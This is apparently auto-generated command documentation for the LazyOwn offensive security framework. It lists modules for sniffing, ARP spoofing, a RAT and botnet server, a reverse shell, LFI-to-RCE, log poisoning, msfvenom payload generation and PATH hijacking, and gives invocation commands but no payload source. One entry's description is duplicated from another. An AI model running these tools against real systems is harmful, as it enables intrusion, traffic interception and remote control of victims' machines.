LazyOwn Framework Doc: COMMANDS.md

COMMANDS.md Documentation by readmeneitor.py

init

Initializer for the LazyOwnShell class.

This method sets up the initial parameters and scripts for an instance of the LazyOwnShell class. It initializes a dictionary of parameters with default values and a list of script names that are part of the LazyOwnShell toolkit.

Attributes: params (dict): A dictionary of parameters with their default values. scripts (list): A list of script names included in the toolkit. output (str): An empty string to store output or results.

log_command

Logs the command execution details to a CSV file.

:param cmd_name: The name of the command. :param cmd_args: The arguments of the command.

default

Handles undefined commands, including aliases.

This method checks if a given command (or its alias) exists within the class by attempting to find a corresponding method. If the command or alias is not found, it prints an error message.

:param line: The command or alias to be handled. :type line: str :return: None

logcsv

No description available.

cmd

Internal function to execute commands.

This method attempts to execute a given command using os.system and captures the output. It sets the output attribute based on whether the command was executed successfully or an exception occurred. And feedback the red operation report.

:param command: The command to be executed. :type command: str :return: None. :rtype: str

one_cmd

Internal function to execute commands.

This method attempts to execute a given command using onecmd and captures the output. It sets the output attribute based on whether the command was executed successfully or an exception occurred.

:param command: The command to be executed. :type command: str :return: A message indicating the result of the command execution. :rtype: str

emptyline

Handle the case where the user enters an empty line.

This method is called when the user submits an empty line of input in the command-line interface. By default, it provides feedback indicating that no command was entered.

It is useful for providing user-friendly messages or handling empty input cases in a custom manner.

License: This function is part of a program released under the GNU General Public License v3.0 (GPLv3). You can redistribute it and/or modify it under the terms of the GPLv3, as published by the Free Software Foundation.

Note: This method is called by the cmd library when an empty line is entered. You can override it in a subclass to change its behavior.

Example: >>> shell = LazyOwnShell() >>> shell.emptyline() You didn’t enter any command.

EOF

Handle the end-of-file (EOF) condition.

This method is called when the user sends an end-of-file (EOF) signal by pressing Ctrl+D. It is typically used to handle cleanup or exit operations when the user terminates input.

In this implementation, it prints a farewell message and returns True to indicate that the shell should exit.

License: This function is part of a program released under the GNU General Public License v3.0 (GPLv3). You can redistribute it and/or modify it under the terms of the GPLv3, as published by the Free Software Foundation.

Note: This method is a part of the cmd library’s command handling system. You can override it in a subclass to customize its behavior.

Example: >>> shell = LazyOwnShell() >>> shell.do_EOF(None) LazyOwn say Goodbye! (shell exits)

postloop

Handle operations to perform after exiting the command loop.

This method is called after the command loop terminates, typically used for performing any final cleanup or displaying messages before the program exits.

In this implementation, it prints a message indicating that the custom shell is exiting.

License: This function is part of a program released under the GNU General Public License v3.0 (GPLv3). You can redistribute it and/or modify it under the terms of the GPLv3, as published by the Free Software Foundation.

Note: This method is called automatically by the cmd library’s command loop after the loop terminates. You can override it in a subclass to customize its behavior.

Example: >>> shell = LazyOwnShell() >>> shell.cmdloop() # Exits the command loop GoodBye LazyOwner

assign

assign a parameter value.

This function takes a line of input, splits it into a parameter and a value, and assign the specified parameter to the given value if the parameter exists.

:param line: A string containing the parameter and value to be set. Expected format: ‘ ’. :type line: str :return: None :raises: ValueError if the input line does not contain exactly two elements.

show

Show the current parameter values.

This function iterates through the current parameters and their values, printing each parameter and its associated value.

:param line: This parameter is not used in the function. :type line: str :return: None

list

Lists all available scripts in the modules directory.

This method prints a list of available scripts in a formatted manner, arranging them into columns. It shows each script with sufficient spacing for readability.

:param line: This parameter is not used in the method. :type line: str :return: None

run

Runs a specific LazyOwn script.

This method executes a script from the LazyOwn toolkit based on the provided script name. If the script is not recognized, it prints an error message. To see available scripts, use the list or help list commands.

:param line: The command line input containing the script name. :type line: str :return: None

lazysearch

Runs the internal module modules/lazysearch.py.

This method executes the lazysearch script from the specified path, using the binary_name parameter from the self.params dictionary. If binary_name is not set, it prints an error message.

:return: None

lazysearch_gui

Run the internal module located at modules/LazyOwnExplorer.py.

This method executes the LazyOwnExplorer.py script, which is used for graphical user interface (GUI) functionality within the LazyOwn framework.

The function performs the following steps:

  1. Calls self.run_script with LazyOwnExplorer.py to execute the GUI module.

:returns: None

Manual execution: 1. Ensure that the modules/LazyOwnExplorer.py script is present in the modules directory. 2. Run the script with: python3 modules/LazyOwnExplorer.py

Example: To run LazyOwnExplorer.py directly, execute: python3 modules/LazyOwnExplorer.py

Note: - Ensure that the script has the appropriate permissions and dependencies to run. - Verify that your environment supports GUI operations if using this script in a non-graphical environment.

lazyown

Run the internal module located at modules/lazyown.py.

This method executes the lazyown.py script, which is a core component of the LazyOwn framework.

The function performs the following steps:

  1. Calls self.run_script with lazyown.py to execute the script.

:returns: None

Manual execution: 1. Ensure that the modules/lazyown.py script is present in the modules directory. 2. Run the script with: python3 modules/lazyown.py

Example: To run lazyown.py directly, execute: python3 modules/lazyown.py

Note: - Ensure that the script has the appropriate permissions and dependencies to run.

update_db

Run the internal module located at modules/update_db.sh.

This method executes the update_db.sh script to update the database of binary exploitables from gtofbins.

The function performs the following steps:

  1. Executes the update_db.sh script located in the modules directory using os.system.

:returns: None

Manual execution: 1. Ensure that the modules/update_db.sh script is present in the modules directory. 2. Run the script with: ./modules/update_db.sh

Example: To manually update the database, execute: ./modules/update_db.sh

Note: - Ensure that the script has execute permissions. - The script should be run with the necessary privileges if required.

lazynmap

Runs the internal module modules/lazynmap.sh for multiple Nmap scans.

This method executes the lazynmap script, using the current working directory and the rhost parameter from the self.params dictionary as the target IP. If rhost is not set, it prints an error message.

:return: None

batchnmap

Runs the internal module modules/lazynmap.sh for multiple Nmap scans.

This method executes the lazynmap script, using the current working directory and the rhost parameter from the self.params dictionary as the target IP. If rhost is not set, it prints an error message.

:return: None

lazywerkzeugdebug

Run the internal module located at modules/lazywerkzeug.py in debug mode.

This method executes the lazywerkzeug.py script with the specified parameters for remote and local hosts and ports. It is used to test Werkzeug in debug mode.

The function performs the following steps:

  1. Retrieves the rhost, lhost, rport, and lport values from self.params.
  2. Checks if all required parameters are set. If not, prints an error message and returns.
  3. Calls self.run_script with lazywerkzeug.py and the specified parameters.

:param rhost: The remote host address. :type rhost: str

:param lhost: The local host address. :type lhost: str

:param rport: The remote port number. :type rport: int

:param lport: The local port number. :type lport: int

:returns: None

Manual execution: 1. Ensure that rhost, lhost, rport, and lport are assign in self.params. 2. The script modules/lazywerkzeug.py should be present in the modules directory. 3. Run the script with: python3 modules/lazywerkzeug.py <rhost> <rport> <lhost> <lport>

Example: To run lazywerkzeug.py with rhost assign to "127.0.0.1", rport to 5000, lhost to "localhost", and lport to 8000, set: self.params["rhost"] = "127.0.0.1" self.params["rport"] = 5000 self.params["lhost"] = "localhost" self.params["lport"] = 8000 Then call: run_lazywerkzeugdebug()

Note: - Ensure that modules/lazywerkzeug.py has the appropriate permissions and dependencies to run. - Verify that the specified hosts and ports are correct and available.

lazygath

Run the internal module located at modules/lazygat.sh. to gathering the sistem :)

This method executes the lazygat.sh script located in the modules directory with sudo privileges.

The function performs the following steps:

  1. Retrieves the current working directory.
  2. Executes the lazygat.sh script using sudo to ensure it runs with elevated permissions.

:returns: None

Manual execution: 1. Ensure that the modules/lazygat.sh script is present in the modules directory. 2. Run the script with: sudo ./modules/lazygat.sh

Example: To manually run the script with elevated privileges, execute: sudo ./modules/lazygat.sh

Note: - Ensure that the script has execute permissions. - The script should be run with sudo if it requires elevated privileges.

lazynmapdiscovery

Runs the internal module modules/lazynmap.sh with discovery mode.

This method executes the lazynmap script in discovery mode. It uses the current working directory for locating the script.

:return: None

lazysniff

Run the sniffer internal module located at modules/lazysniff.py with the specified parameters.

This method executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the device value from self.params.
  2. Sets up the environment variables LANG and TERM to ensure proper script execution.
  3. Uses subprocess.run to execute the lazysniff.py script with the -i option to specify the network interface.

:param device: The network interface to be used for sniffing. :type device: str

:returns: None

Manual execution: 1. Ensure that device is assign in self.params. 2. The script modules/lazysniff.py should be present in the modules directory. 3. Run the script with: python3 modules/lazysniff.py -i <device>

Example: To run lazysniff with device assign to "eth0", set: self.params["device"] = "eth0" Then call: run_lazysniff()

Note: - Ensure that modules/lazysniff.py has the appropriate permissions and dependencies to run. - Ensure that the network interface specified is valid and properly configured.

lazyftpsniff

Run the sniffer ftp internal module located at modules/lazyftpsniff.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the device value from self.params.
  2. Sets up the environment variables LANG and TERM to ensure proper script execution.
  3. Uses subprocess.run to execute the lazyftpsniff.py script with the -i option to specify the network interface.

:param device: The network interface to be used for sniffing. :type device: str

:returns: None

Manual execution: 1. Ensure that device is assign in self.params. 2. The script modules/lazyftpsniff.py should be present in the modules directory. 3. Run the script with: python3 modules/lazyftpsniff.py -i <device>

Example: To run lazyftpsniff with device assign to "eth0", set: self.params["device"] = "eth0" Then call: run_lazyftpsniff()

Note: - Ensure that modules/lazyftpsniff.py has the appropriate permissions and dependencies to run. - Ensure that the network interface specified is valid and properly configured.

lazynetbios

Run the internal module to search netbios vuln victims, located at modules/lazynetbios.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the startip, endip, and spoof_ip values from self.params.
  2. Uses subprocess.run to execute the lazynetbios.py script with the specified parameters.

:param startip: The starting IP address for the NetBIOS scan. :type startip: str

:param endip: The ending IP address for the NetBIOS scan. :type endip: str

:param spoof_ip: The IP address to be used for spoofing. :type spoof_ip: str

:returns: None

Manual execution: 1. Ensure that startip, endip, and spoof_ip are assign in self.params. 2. The script modules/lazynetbios.py should be present in the modules directory. 3. Run the script with: python3 modules/lazynetbios.py <startip> <endip> <spoof_ip>

Example: To run lazynetbios with startip assign to "192.168.1.1", endip assign to "192.168.1.10", and spoof_ip assign to "192.168.1.100", assign: self.params["startip"] = "192.168.1.1" self.params["endip"] = "192.168.1.10" self.params["spoof_ip"] = "192.168.1.100" Then call: run_lazynetbios()

Note: - Ensure that modules/lazynetbios.py has the appropriate permissions and dependencies to run. - Ensure that the IP addresses are correctly set and valid for the NetBIOS scan.

lazyhoneypot

Run the internal module located at modules/lazyhoneypot.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the email_from, email_to, email_username, and email_password values from self.params.
  2. Calls the run_script method to execute the lazyhoneypot.py script with the provided email parameters.

:param email_from: The email address from which messages will be sent. :type email_from: str

:param email_to: The recipient email address. :type email_to: str

:param email_username: The username for email authentication. :type email_username: str

:param email_password: The password for email authentication. :type email_password: str

:returns: None

Manual execution: 1. Ensure that email_from, email_to, email_username, and email_password are assign in self.params. 2. The script modules/lazyhoneypot.py should be present in the modules directory. 3. Run the script with: python3 modules/lazyhoneypot.py --email_from <email_from> --email_to <email_to> --email_username <email_username> --email_password <email_password>

Example: To run lazyhoneypot with email_from assign to "sender@example.com", email_to assign to "recipient@example.com", email_username assign to "user", and email_password assign to "pass", set: self.params["email_from"] = "sender@example.com" self.params["email_to"] = "recipient@example.com" self.params["email_username"] = "user" self.params["email_password"] = "pass" Then call: run_lazyhoneypot()

Note: - Ensure that modules/lazyhoneypot.py has the appropriate permissions and dependencies to run. - Ensure that the email credentials are correctly set for successful authentication and operation.

gpt

Run the internal module to create Oneliners with Groq AI located at modules/lazygptcli.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the prompt and api_key values from self.params.
  2. Checks if both prompt and api_key are assign. If either is missing, it prints an error message and returns.
  3. Sets the environment variable GROQ_API_KEY with the provided api_key.
  4. Calls the run_script method to execute the lazygptcli.py script with the --prompt argument.

:param prompt: The prompt to be used by the script. :type prompt: str

:param api_key: The API key for accessing the service. :type api_key: str

:returns: None

Manual execution: 1. Ensure that prompt and api_key are assign in self.params. 2. The script modules/lazygptcli.py should be present in the modules directory. 3. assign the environment variable GROQ_API_KEY with the API key value. 4. Run the script with: python3 modules/lazygptcli.py --prompt <prompt>

Example: To run lazygptcli with prompt assign to "Your prompt" and api_key assign to "your_api_key", set: self.params["prompt"] = "Your prompt" self.params["api_key"] = "your_api_key" Then call: run_lazygptcli()

Note: - Ensure that modules/lazygptcli.py has the appropriate permissions and dependencies to run. - The environment variable GROQ_API_KEY must be correctly assign for the script to function.

lazysearch_bot

Run the internal module GROQ AI located at modules/lazysearch_bot.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the prompt and api_key values from self.params.
  2. Checks if both prompt and api_key are assign. If either is missing, it prints an error message and returns.
  3. Sets the environment variable GROQ_API_KEY with the provided api_key.
  4. Calls the run_script method to execute the lazysearch_bot.py script with the --prompt argument.

:param prompt: The prompt to be used by the script. :type prompt: str

:param api_key: The API key for accessing the service. :type api_key: str

:returns: None

Manual execution: 1. Ensure that prompt and api_key are assign in self.params. 2. The script modules/lazysearch_bot.py should be present in the modules directory. 3. Set the environment variable GROQ_API_KEY with the API key value. 4. Run the script with: python3 modules/lazysearch_bot.py --prompt <prompt>

Example: To run lazysearch_bot with prompt assign to "Search query" and api_key assign to "your_api_key", assign: self.params["prompt"] = "Search query" self.params["api_key"] = "your_api_key" Then call: run_lazysearch_bot()

Note: - Ensure that modules/lazysearch_bot.py has the appropriate permissions and dependencies to run. - The environment variable GROQ_API_KEY must be correctly assign for the script to function.

lazymetaextract0r

Run the Metadata extractor internal module located at modules/lazyown_metaextract0r.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the value for path from self.params.
  2. Checks if the path parameter is assign. If not, it prints an error message and returns.
  3. Calls the run_script method to execute the lazyown_metaextract0r.py script with the appropriate argument.

:param path: The file path to be processed by the script. :type path: str

:returns: None

Manual execution: 1. Ensure that path is assign in self.params. 2. The script modules/lazyown_metaextract0r.py should be present in the modules directory. 3. Run the script with: python3 modules/lazyown_metaextract0r.py --path <path>

Example: To run lazyown_metaextract0r with path assign to /home/user/file.txt, set: self.params["path"] = "/home/user/file.txt" Then call: run_lazymetaextract0r()

Note: - Ensure that modules/lazyown_metaextract0r.py has the appropriate permissions and dependencies to run.

lazyownratcli

Run the internal module located at modules/lazyownclient.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the values for lhost, lport, and rat_key from self.params.
  2. Checks if all required parameters (lhost, lport, and rat_key) are set. If any are missing, it prints an error message and returns.
  3. Calls the run_script method to execute the lazyownclient.py script with the appropriate arguments.

:param lhost: The IP address of the local host. :type lhost: str :param lport: The port number of the local host. :type lport: int :param rat_key: The RAT key. :type rat_key: str

:returns: None

Manual execution: 1. Ensure that lhost, lport, and rat_key are assign in self.params. 2. The script modules/lazyownclient.py should be present in the modules directory. 3. Run the script with: python3 modules/lazyownclient.py --host <lhost> --port <lport> --key <rat_key>

Example: To run lazyownclient with lhost assign to 192.168.1.10, lport assign to 8080, and rat_key assign to my_secret_key, set: self.params["lhost"] = "192.168.1.10" self.params["lport"] = 8080 self.params["rat_key"] = "my_secret_key" Then call: run_lazyownratcli()

Note: - Ensure that modules/lazyownclient.py has the appropriate permissions and dependencies to run.

lazyownrat

Run the internal module located at modules/lazyownserver.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the values for rhost, rport, and rat_key from self.params.
  2. Checks if all required parameters (rhost, rport, and rat_key) are set. If any are missing, it prints an error message and returns.
  3. Calls the run_script method to execute the lazyownserver.py script with the appropriate arguments.

:param rhost: The IP address of the remote host. :type rhost: str :param rport: The port number of the remote host. :type rport: int :param rat_key: The RAT key. :type rat_key: str

:returns: None

Manual execution: 1. Ensure that rhost, rport, and rat_key are assign in self.params. 2. The script modules/lazyownserver.py should be present in the modules directory. 3. Run the script with: python3 modules/lazyownserver.py --host <rhost> --port <rport> --key <rat_key>

Example: To run lazyownserver with rhost set to 192.168.1.10, rport assign to 8080, and rat_key assign to my_secret_key, set: self.params["rhost"] = "192.168.1.10" self.params["rport"] = 8080 self.params["rat_key"] = "my_secret_key" Then call: run_lazyownrat()

Note: - Ensure that modules/lazyownserver.py has the appropriate permissions and dependencies to run.

lazybotnet

Run the internal module located at modules/lazybotnet.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the values for rport and rat_key from self.params. The rhost is hardcoded to “0.0.0.0”.
  2. Checks if all required parameters (rport and rat_key) are set. If any are missing, it prints an error message and returns.
  3. Calls the run_script method to execute the lazybotnet.py script with the appropriate arguments.

:param rport: The port number of the remote host. :type rport: int :param rat_key: The RAT key. :type rat_key: str

:returns: None

Manual execution: 1. Ensure that rport and rat_key are assign in self.params. 2. The script modules/lazybotnet.py should be present in the modules directory. 3. Run the script with: python3 modules/lazybotnet.py --host <rhost> --port <rport> --key <rat_key>

Example: To run lazybotnet with rport assign to 1234 and rat_key assign to my_key, assign: self.params["rport"] = 1234 self.params["rat_key"] = "my_key" Then call: run_lazybotnet()

Note: - Ensure that modules/lazybotnet.py has the appropriate permissions and dependencies to run.

lazylfi2rce

Run the internal module located at modules/lazylfi2rce.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the values for rhost, rport, lhost, lport, field, and wordlist from self.params.
  2. Checks if all required parameters are set. If any are missing, it prints an error message and returns.
  3. Calls the run_script method to execute the lazylfi2rce.py script with the appropriate arguments.

:param rhost: The IP address of the remote host. :type rhost: str :param rport: The port number of the remote host. :type rport: int :param lhost: The IP address of the local host. :type lhost: str :param lport: The port number of the local host. :type lport: int :param field: The field name for the LFI attack. :type field: str :param wordlist: The path to the wordlist file. :type wordlist: str

:returns: None

Manual execution: 1. Ensure that rhost, rport, lhost, lport, field, and wordlist are assign in self.params. 2. The script modules/lazylfi2rce.py should be present in the modules directory. 3. Run the script with: python3 modules/lazylfi2rce.py --rhost <rhost> --rport <rport> --lhost <lhost> --lport <lport> --field <field> --wordlist <wordlist>

Example: To run the lazylfi2rce with rhost assign to 192.168.1.1, rport assign to 80, lhost assign to 192.168.1.2, lport assign to 8080, field assign to file, and wordlist assign to path/to/wordlist.txt, set: self.params["rhost"] = "192.168.1.1" self.params["rport"] = 80 self.params["lhost"] = "192.168.1.2" self.params["lport"] = 8080 self.params["field"] = "file" self.params["wordlist"] = "path/to/wordlist.txt" Then call: run_lazylfi2rce()

Note: - Ensure that modules/lazylfi2rce.py has the appropriate permissions and dependencies to run.

lazylogpoisoning

Run the internal module located at modules/lazylogpoisoning.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the values for rhost and lhost from self.params.
  2. Checks if the required parameters rhost and lhost are assign. If not, it prints an error message and returns.
  3. Calls the run_script method to execute the lazylogpoisoning.py script with the appropriate arguments.

:param rhost: The IP address of the remote host. Must be assign in self.params. :type rhost: str :param lhost: The IP address of the local host. Must be assign in self.params. :type lhost: str

:returns: None

Manual execution: 1. Ensure that rhost and lhost are assign in self.params. 2. The script modules/lazylogpoisoning.py should be present in the modules directory. 3. Run the script with: python3 modules/lazylogpoisoning.py --rhost <rhost> --lhost <lhost>

Example: To run the lazylogpoisoning with rhost assign to 192.168.1.1 and lhost assign to 192.168.1.2, set: self.params["rhost"] = "192.168.1.1" self.params["lhost"] = "192.168.1.2" Then call: run_lazylogpoisoning()

Note: - Ensure that modules/lazylogpoisoning.py has the appropriate permissions and dependencies to run.

lazybotcli

Run the internal module located at modules/lazybotcli.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the values for rport and rat_key from self.params.
  2. Checks if the required parameters rport and rat_key are assign. If not, it prints an error message and returns.
  3. Calls the run_script method to execute the lazybotcli.py script with the appropriate arguments.

:param rport: The port number for the connection. Must be assign in self.params. :type rport: int :param rat_key: The key for the RAT. Must be assign in self.params. :type rat_key: str

:returns: None

Manual execution: 1. Ensure that rport and rat_key are assign in self.params. 2. The script modules/lazybotcli.py should be present in the modules directory. 3. Run the script with: python3 modules/lazybotcli.py --host 0.0.0.0 --port <rport> --key <rat_key>

Example: To run the lazybotcli with port 12345 and key mysecretkey, set: self.params["rport"] = 12345 self.params["rat_key"] = "mysecretkey" Then call: run_lazybotcli()

Note: - Ensure that modules/lazybotcli.py has the appropriate permissions and dependencies to run.

lazyssh77enum

Run the internal module located at modules/lazybrutesshuserenum.py with the specified parameters. ONLY valid for 7.x Version !!!

The script will be executed with the following arguments:

The function performs the following steps:

  1. Retrieves the values for wordlist and rhost from self.params.
  2. Prints a warning message about the potential inaccuracy of the results.
  3. Constructs the command to run the lazybrutesshuserenum.sh script with the specified arguments.
  4. Executes the command using the os.system method.

:param wordlist: The path to the wordlist file for username enumeration. Must be assign in self.params. :type wordlist: str :param rhost: The target IP address or hostname for SSH enumeration. Must be assign in self.params. :type rhost: str

:returns: None

Manual execution: 1. Ensure that wordlist and rhost are assign in self.params. 2. Run the script modules/lazybrutesshuserenum.sh with the appropriate arguments.

Dependencies: - modules/lazybrutesshuserenum.sh must be present in the modules directory and must be executable.

Example: To run the SSH user enumeration with a wordlist located at /path/to/wordlist.txt and target IP 192.168.1.1, set: self.params["usrwordlist"] = "/path/to/wordlist.txt" self.params["rhost"] = "192.168.1.1" Then call: run_lazyssh77enum()

Note: - The accuracy of the results may vary depending on the version of the script and the wordlist used.

lazyburpfuzzer

Run the internal module located at modules/lazyown_burpfuzzer.py with the specified parameters.

The script will be executed with the following arguments:

The function performs the following steps:

  1. Retrieves the values for url, method, headers, params, data, json_data, proxy_port, wordlist, and hide_code from self.params.
  2. Constructs the command to run the lazyown_burpfuzzer.py script with the specified arguments.
  3. Adds optional parameters based on whether the corresponding files (headers_file, data_file, params_file, json_data_file) are provided.
  4. Executes the command using the run_command method.

:param url: The target URL for the fuzzer. Must be assign in self.params. :type url: str :param method: The HTTP method to use. Must be assign in self.params. :type method: str :param headers: Optional HTTP headers. Must be assign in self.params or provided via headers_file. :type headers: str :param params: Optional URL parameters. Must be assign in self.params or provided via params_file. :type params: str :param data: Optional data for the request body. Must be assign in self.params or provided via data_file. :type data: str :param json_data: Optional JSON data for the request body. Must be assign in self.params or provided via json_data_file. :type json_data: str :param proxy_port: The port for the proxy server. Must be assign in self.params. :type proxy_port: int :param wordlist: Optional wordlist for fuzzing. Must be assign in self.params. :type wordlist: str :param hide_code: Optional code to hide. Must be assign in self.params. :type hide_code: int :param headers_file: Optional file containing headers. :type headers_file: str, optional :param data_file: Optional file containing data. :type data_file: str, optional :param params_file: Optional file containing parameters. :type params_file: str, optional :param json_data_file: Optional file containing JSON data. :type json_data_file: str, optional

:returns: None

Manual execution: 1. Ensure that url, method, and proxy_port are assign in self.params. 2. Provide additional parameters as needed. 3. Run the script modules/lazyown_burpfuzzer.py with the appropriate arguments.

Dependencies: - modules/lazyown_burpfuzzer.py must be present in the modules directory and must be executable.

Example: To run the fuzzer with URL http://example.com, HTTP method POST, and proxy port 8080, set: self.params["url"] = "http://example.com" self.params["method"] = "POST" self.params["proxy_port"] = 8080 Then call: run_lazyburpfuzzer()

Note: - Ensure that all required parameters are assign before calling this function. - Parameters can also be provided via corresponding files.

lazyreverse_shell

Run the internal module located at modules/lazyreverse_shell.sh with the specified parameters.

The script will be executed with the following arguments: - --ip: The IP address to use for the reverse shell. - --puerto: The port to use for the reverse shell.

The function performs the following steps:

  1. Retrieves the values for rhost (IP address) and reverse_shell_port (port) from self.params.
  2. Validates that rhost and reverse_shell_port parameters are assign.
  3. Constructs the command to run the lazyreverse_shell.sh script with the specified arguments.
  4. Executes the command.

:param ip: The IP address to use for the reverse shell. Must be assign in self.params. :type ip: str :param port: The port to use for the reverse shell. Must be assign in self.params. :type port: str

:returns: None

Manual execution: 1. Ensure that rhost and reverse_shell_port are assign in self.params. 2. Run the script modules/lazyreverse_shell.sh with the appropriate arguments.

Dependencies: - modules/lazyreverse_shell.sh must be present in the modules directory and must be executable.

Example: To assign up a reverse shell with IP 192.168.1.100 and port 4444, assign: self.params["rhost"] = "192.168.1.100" self.params["reverse_shell_port"] = "4444" Then call: run_lazyreverse_shell()

Note: - Ensure that modules/lazyreverse_shell.sh has the necessary permissions to execute. - Parameters must be assign before calling this function.

lazyarpspoofing

Run the internal module located at modules/lazyarpspoofing.py with the specified parameters.

The script will be executed with the following arguments: - --device: The network interface to use for ARP spoofing. - lhost: The local host IP address to spoof. - rhost: The remote host IP address to spoof.

The function performs the following steps:

  1. Retrieves the values for lhost, rhost, and device from self.params.
  2. Validates that lhost, rhost, and device parameters are assign.
  3. Constructs the command to run the lazyarpspoofing.py script with the specified arguments.
  4. Executes the command.

:param lhost: The local host IP address to spoof. Must be assign in self.params. :type lhost: str :param rhost: The remote host IP address to spoof. Must be assign in self.params. :type rhost: str :param device: The network interface to use for ARP spoofing. Must be assign in self.params. :type device: str

:returns: None

Manual execution: 1. Ensure that lhost, rhost, and device are assign in self.params. 2. Run the script modules/lazyarpspoofing.py with the appropriate arguments.

Dependencies: - modules/lazyarpspoofing.py must be present in the modules directory and must be executable.

Example: To execute ARP spoofing with local host 192.168.1.2, remote host 192.168.1.1, and device eth0, set: self.params["lhost"] = "192.168.1.2" self.params["rhost"] = "192.168.1.1" self.params["device"] = "eth0" Then call: run_lazyarpspoofing()

Note: - Ensure that modules/lazyarpspoofing.py has the necessary permissions to execute. - Parameters must be assign before calling this function.

lazyattack

Run the internal module located at modules/lazyatack.sh with the specified parameters.

The script will be executed with the following arguments: - --modo: The mode of the attack. - --ip: The target IP address. - --atacante: The attacker IP address.

The function performs the following steps:

  1. Retrieves the current working directory.
  2. Validates that mode, rhost, and lhost parameters are assign.
  3. Constructs the command to run the lazyatack.sh script with the specified arguments.
  4. Executes the command.

:param mode: The mode in which the attack should be run. Must be assign in self.params. :type mode: str :param target_ip: The IP address of the target. Must be assign in self.params. :type target_ip: str :param attacker_ip: The IP address of the attacker. Must be assign in self.params. :type attacker_ip: str

:returns: None

Manual execution: 1. Ensure that mode, rhost, and lhost are assign in self.params. 2. Run the script modules/lazyatack.sh with the appropriate arguments.

Dependencies: - modules/lazyatack.sh must be present in the modules directory and must be executable.

Example: To execute the attack with mode scan, target IP 192.168.1.100, and attacker IP 192.168.1.1, assign: self.params["mode"] = "scan" self.params["rhost"] = "192.168.1.100" self.params["lhost"] = "192.168.1.1" Then call: run_lazyattack()

Note: - Ensure that modules/lazyatack.sh has the necessary permissions to execute. - Parameters must be assign before calling this function.

lazymsfvenom

Executes the msfvenom tool to generate a variety of payloads based on user input.

This function prompts the user to select a payload type from a predefined list and runs the corresponding msfvenom command to create the desired payload. It handles tasks such as generating different types of payloads for Linux, Windows, macOS, and Android systems, including optional encoding with Shikata Ga Nai for C payloads.

The generated payloads are moved to a sessions directory, where appropriate permissions are assign. Additionally, the payloads can be compressed using UPX for space efficiency. If the selected payload is an Android APK, the function will also sign the APK and perform necessary post-processing steps.

:param line: Command line arguments for the script. :return: None

lazyaslrcheck

Creates a path hijacking attack by performing the following steps:

  1. Appends the value of binary_name to a temporary script located at modules/tmp.sh.
  2. Copies this temporary script to /tmp with the name specified by binary_name.
  3. Sets executable permissions on the copied script.
  4. Prepends /tmp to the system’s PATH environment variable to ensure the script is executed in preference to other binaries.

The function then prints out each command being executed and a message indicating the binary name used for the path hijacking.

:param binary_name: The name of the binary to be used in the path hijacking attack. It should be assign in self.params before calling this method. :type binary_name: str

:returns: None

Manual execution: 1. Ensure that binary_name is assign in self.params. 2. Append the binary name to modules/tmp.sh. 3. Copy modules/tmp.sh to /tmp/{binary_name}. 4. assign executable permissions on the copied file. 5. Update the PATH environment variable to prioritize /tmp.

Dependencies: - The self.params dictionary must contain a valid binary_name. - Ensure that modules/tmp.sh exists and contains appropriate content for the attack.

Example: To execute the path hijacking attack with binary_name as malicious, ensure self.params["binary_name"] is assign to "malicious", and then call: run_lazypathhijacking()

Note: - The binary_name parameter must be a string representing the name of the binary to hijack. - The method modifies the PATH environment variable, which may affect the execution of other binaries.

lazypathhijacking

Creates a path hijacking attack by performing the following steps:

  1. Appends the value of binary_name to a temporary script located at modules/tmp.sh.
  2. Copies this temporary script to /tmp with the name specified by binary_name.
  3. Sets executable permissions on the copied script.
  4. Prepends /tmp to the system’s PATH environment variable to ensure the script is executed in preference to other binaries.

The function then prints out each command being executed and a message indicating the binary name used for the path hijacking.

:param binary_name: The name of the binary to be used in the path hijacking attack. :returns: None

script

Run a script with the given arguments

This method constructs and executes a command to run a Python script with the specified arguments. It uses the run_command method to execute the script and handle real-time output.

:param script_name: The name of the script to be executed. :type script_name: str :param args: The arguments to be passed to the script. :type args: tuple of str

:returns: None

Manual execution: 1. Build the command list with “python3”, the script name, and the arguments. 2. Call run_command with the constructed command list.

Dependencies: - run_command method for executing the constructed command and streaming output.

Example: To execute a script named example.py with arguments arg1 and arg2, call: run_script("example.py", "arg1", "arg2")

Note: - The script_name parameter should be a string representing the name of the script. - The args parameter is a variable-length argument list containing the arguments to be passed to the script. - Ensure that the script and arguments are properly specified.

command

Run a command and print output in real-time

This method executes a given command using subprocess.Popen and streams both the standard output and standard error to the console in real-time. The output from both streams is appended to the self.output attribute. If interrupted, the process is terminated gracefully.

:param command: The command to be executed. :type command: str

:returns: None

Manual execution: 1. Execute the command specified by the command parameter. 2. Stream and print the command’s standard output and error to the console in real-time. 3. Append all output to the self.output attribute. 4. Handle KeyboardInterrupt by terminating the process and printing an error message.

Dependencies: - subprocess module for running the command and capturing output. - print_msg function for printing output to the console. - print_error function for printing error messages to the console.

Example: To execute a command, call run_command("ls -l").

Note: - The command parameter should be a string representing the command to be executed. - self.output must be initialized before calling this method. - Ensure proper exception handling to manage process interruptions.

payload

Load parameters from a specified payload JSON file.

This function loads parameters from a JSON file specified by the line argument and updates the instance’s params dictionary with the values from the file. If the file does not exist or contains invalid JSON, it will print an appropriate error message.

Usage: payload

:param line: The name of the JSON file to load. :type line: str

:returns: None

Manual execution: 1. Open and read the specified JSON file. 2. Update the params dictionary with values from the JSON file. 3. Print a success message if the parameters were successfully loaded. 4. Handle FileNotFoundError if the file does not exist. 5. Handle JSONDecodeError if there is an error decoding the JSON file.

Dependencies: - json module for reading and parsing the JSON file.

Example: To execute the function, call payload payload_10.10.10.10.json.

